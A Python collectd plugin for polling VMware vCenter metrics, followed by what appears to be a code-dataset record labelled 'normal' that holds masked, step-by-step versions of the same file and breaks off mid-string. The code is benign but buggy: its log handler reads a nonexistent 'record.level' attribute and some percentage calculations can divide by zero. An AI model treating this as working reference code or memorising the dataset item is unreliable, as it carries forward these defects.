Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
# report information for all vCenter servers
for vcenter, data in info.items():
# report datastore information
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
# report datacenter information
for dc_name, dc_data in data['datacenter'].items():
# extract any cluster and host information for later processing
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
# report cluster information
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
# report host information
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {
logging.CRITICAL: collectd.error,
logging.ERROR: collectd.error,
logging.WARN: collectd.warning,
logging.INFO: collectd.info,
logging.DEBUG: collectd.info,
}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.level == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.level]
handler(record.getMessage())
if COLLECTD_ENABLED:
instance = CollectdCollector([])
collectd.register_config(instance.configure)
collectd.register_read(instance.read)
|
normal
|
{
"blob_id": "55f76ae1ffe0fb2d2ca2c7a20aab45ffb00cf178",
"index": 613,
"step-1": "<mask token>\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Collector(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n self.log.debug('found host: %s' % (name,))\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n if '.' in name and name.count('.') != 3:\n name = name.split('.')[0]\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize', 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':\n cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,\n 'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':\n mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,\n 'vms_stopped': vms_stopped}\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Collector(object):\n\n def __init__(self, vcenters, username=None, password=None, verbose=False):\n \"\"\"\n Configuration to poll a vCenter cluster for performance data.\n\n :param list vcenters:\n A list of one or more vCenter server IPs or hostnames.\n :param str username:\n The username to use to authenticate against the vCenter cluster.\n :param str password:\n The password associated with the specified user.\n :param bool verbose: (optional)\n Whether to enable verbose logging.\n :param int sleep_time: (optional)\n Number of seconds to wait between polls.\n\n \"\"\"\n self.vcenters = vcenters\n self.username = username\n self.password = password\n self.verbose = verbose\n if COLLECTD_ENABLED:\n self.log = logging.getLogger()\n self.log.addHandler(CollectdHandler(self.verbose))\n else:\n logging.basicConfig(level=logging.DEBUG)\n self.log = logging.getLogger()\n\n def poll(self):\n \"\"\"\n Collect current performance information.\n\n \"\"\"\n stats = {}\n for vcenter in self.vcenters:\n stats[vcenter] = self.poll_vcenter(vcenter)\n return stats\n\n def poll_vcenter(self, vcenter):\n \"\"\"\n Open a connection to the specified vCenter server and begin gathering\n information about its datastores, datacenters, clusters, and hosts.\n\n :param str vcenter:\n The hostname or IP of a vCenter server.\n\n :returns:\n A dictionary containing information about the current state of\n objects managed by the specified vCenter.\n\n \"\"\"\n self.log.debug('polling %s@%s' % (self.username, vcenter))\n server = VIServer()\n try:\n server.connect(vcenter, self.username, self.password)\n except:\n self.log.exception('Failed to connect to %s' % (vcenter,))\n return {}\n stats = {'datastore': {}, 'datacenter': {}}\n for obj, name in server.get_datastores().items():\n ds_stats = self.poll_datastore(server, obj, name)\n stats['datastore'][name] = ds_stats\n datacenters = server.get_datacenters()\n for obj, name in datacenters.items():\n dc_stats = self.poll_datacenter(server, obj, name)\n stats['datacenter'][name] = dc_stats\n return stats\n <mask token>\n\n def poll_datacenter(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datacenter.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datacenter.\n :param str name:\n Name of the datacenter.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter. This dictionary includes information about each cluster\n and host that is part of the specified datacenter.\n\n \"\"\"\n if '.' in name:\n name = name.split('.')[0]\n stats = self._poll_group('datacenter', server, obj, name)\n cluster_host_stats = self._poll_group('cluster', server, obj, name)\n for key, value in cluster_host_stats.items():\n if key not in stats:\n stats[key] = value\n elif isinstance(stats[key], dict):\n for c_key, c_value in value.items():\n stats[key][c_key] = c_value\n elif 'percent' in key:\n stats[key] = (stats[key] + value) / 2\n else:\n stats[key] += value\n return stats\n\n def poll_cluster(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific cluster.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the cluster.\n :param str name:\n Name of the cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n cluster. This dictionary includes information about each host that\n is part of the specified cluster.\n\n \"\"\"\n return self._poll_group('cluster', server, obj, name)\n\n def _poll_group(self, group_type, server, obj, name):\n \"\"\"\n Generic metrics gathering for datacenters and clusters.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for a datacenter or cluster.\n :param str name:\n Name of a datacenter or cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter/cluster. This dictionary includes information about each\n cluster and/or host that is part of the specified object.\n\n \"\"\"\n if group_type == 'datacenter':\n find_children = server.get_clusters\n poll_child = self.poll_cluster\n child_type = 'cluster'\n elif group_type == 'cluster':\n find_children = server.get_clusters\n find_children = server.get_hosts\n poll_child = self.poll_host\n child_type = 'host'\n self.log.debug('start querying %s: %s' % (group_type, name))\n children = find_children(obj)\n self.log.debug('finish querying %s: %s' % (group_type, name))\n cpu_total = cpu_usage = cpu_percent = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n child_stats = {}\n for child_obj, child_name in children.items():\n stats = poll_child(server, child_obj, child_name)\n child_stats[child_name] = stats\n cpu_total += stats['cpu_total']\n cpu_usage += stats['cpu_usage']\n mem_total += stats['mem_total']\n mem_usage += stats['mem_usage']\n vms_total += stats['vms_total']\n vms_running += stats['vms_running']\n vms_stopped += stats['vms_stopped']\n if cpu_total > 0:\n cpu_percent = cpu_usage / float(cpu_total) * 100\n if mem_total > 0:\n mem_percent = mem_usage / float(mem_total) * 100\n group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':\n mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,\n 'vms_running': vms_running, 'vms_stopped': vms_stopped,\n child_type: child_stats}\n return group_stats\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n self.log.debug('found host: %s' % (name,))\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n if '.' in name and name.count('.') != 3:\n name = name.split('.')[0]\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize', 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':\n cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,\n 'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':\n mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,\n 'vms_stopped': vms_stopped}\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Collector(object):\n\n def __init__(self, vcenters, username=None, password=None, verbose=False):\n \"\"\"\n Configuration to poll a vCenter cluster for performance data.\n\n :param list vcenters:\n A list of one or more vCenter server IPs or hostnames.\n :param str username:\n The username to use to authenticate against the vCenter cluster.\n :param str password:\n The password associated with the specified user.\n :param bool verbose: (optional)\n Whether to enable verbose logging.\n :param int sleep_time: (optional)\n Number of seconds to wait between polls.\n\n \"\"\"\n self.vcenters = vcenters\n self.username = username\n self.password = password\n self.verbose = verbose\n if COLLECTD_ENABLED:\n self.log = logging.getLogger()\n self.log.addHandler(CollectdHandler(self.verbose))\n else:\n logging.basicConfig(level=logging.DEBUG)\n self.log = logging.getLogger()\n\n def poll(self):\n \"\"\"\n Collect current performance information.\n\n \"\"\"\n stats = {}\n for vcenter in self.vcenters:\n stats[vcenter] = self.poll_vcenter(vcenter)\n return stats\n\n def poll_vcenter(self, vcenter):\n \"\"\"\n Open a connection to the specified vCenter server and begin gathering\n information about its datastores, datacenters, clusters, and hosts.\n\n :param str vcenter:\n The hostname or IP of a vCenter server.\n\n :returns:\n A dictionary containing information about the current state of\n objects managed by the specified vCenter.\n\n \"\"\"\n self.log.debug('polling %s@%s' % (self.username, vcenter))\n server = VIServer()\n try:\n server.connect(vcenter, self.username, self.password)\n except:\n self.log.exception('Failed to connect to %s' % (vcenter,))\n return {}\n stats = {'datastore': {}, 'datacenter': {}}\n for obj, name in server.get_datastores().items():\n ds_stats = self.poll_datastore(server, obj, name)\n stats['datastore'][name] = ds_stats\n datacenters = server.get_datacenters()\n for obj, name in datacenters.items():\n dc_stats = self.poll_datacenter(server, obj, name)\n stats['datacenter'][name] = dc_stats\n return stats\n\n def poll_datastore(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datastore.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datastore.\n :param str name:\n Name of the datastore.\n\n :returns:\n A dictionary with four keys: capacity, free, used, and usage. The\n capacity, free, and used space are measured in megabytes while the\n usage is a percentage.\n\n \"\"\"\n capacity = free = usage = 0\n try:\n self.log.debug('query datastore %s' % (name,))\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.capacity', 'summary.freeSpace'], from_node\n =obj, obj_type='Datastore')\n for ps in props:\n for prop in ps.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.capacity':\n capacity = pv / MB\n elif pn == 'summary.freeSpace':\n free = pv / MB\n except:\n self.log.exception('Failed to get datastore metrics')\n if capacity > 0:\n usage = (capacity - free) / float(capacity) * 100\n return {'capacity': capacity, 'free': free, 'used': capacity - free,\n 'usage': usage}\n\n def poll_datacenter(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datacenter.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datacenter.\n :param str name:\n Name of the datacenter.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter. This dictionary includes information about each cluster\n and host that is part of the specified datacenter.\n\n \"\"\"\n if '.' in name:\n name = name.split('.')[0]\n stats = self._poll_group('datacenter', server, obj, name)\n cluster_host_stats = self._poll_group('cluster', server, obj, name)\n for key, value in cluster_host_stats.items():\n if key not in stats:\n stats[key] = value\n elif isinstance(stats[key], dict):\n for c_key, c_value in value.items():\n stats[key][c_key] = c_value\n elif 'percent' in key:\n stats[key] = (stats[key] + value) / 2\n else:\n stats[key] += value\n return stats\n\n def poll_cluster(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific cluster.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the cluster.\n :param str name:\n Name of the cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n cluster. This dictionary includes information about each host that\n is part of the specified cluster.\n\n \"\"\"\n return self._poll_group('cluster', server, obj, name)\n\n def _poll_group(self, group_type, server, obj, name):\n \"\"\"\n Generic metrics gathering for datacenters and clusters.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for a datacenter or cluster.\n :param str name:\n Name of a datacenter or cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter/cluster. This dictionary includes information about each\n cluster and/or host that is part of the specified object.\n\n \"\"\"\n if group_type == 'datacenter':\n find_children = server.get_clusters\n poll_child = self.poll_cluster\n child_type = 'cluster'\n elif group_type == 'cluster':\n find_children = server.get_clusters\n find_children = server.get_hosts\n poll_child = self.poll_host\n child_type = 'host'\n self.log.debug('start querying %s: %s' % (group_type, name))\n children = find_children(obj)\n self.log.debug('finish querying %s: %s' % (group_type, name))\n cpu_total = cpu_usage = cpu_percent = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n child_stats = {}\n for child_obj, child_name in children.items():\n stats = poll_child(server, child_obj, child_name)\n child_stats[child_name] = stats\n cpu_total += stats['cpu_total']\n cpu_usage += stats['cpu_usage']\n mem_total += stats['mem_total']\n mem_usage += stats['mem_usage']\n vms_total += stats['vms_total']\n vms_running += stats['vms_running']\n vms_stopped += stats['vms_stopped']\n if cpu_total > 0:\n cpu_percent = cpu_usage / float(cpu_total) * 100\n if mem_total > 0:\n mem_percent = mem_usage / float(mem_total) * 100\n group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':\n mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,\n 'vms_running': vms_running, 'vms_stopped': vms_stopped,\n child_type: child_stats}\n return group_stats\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n self.log.debug('found host: %s' % (name,))\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n if '.' in name and name.count('.') != 3:\n name = name.split('.')[0]\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize', 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':\n cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,\n 'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':\n mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,\n 'vms_stopped': vms_stopped}\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric 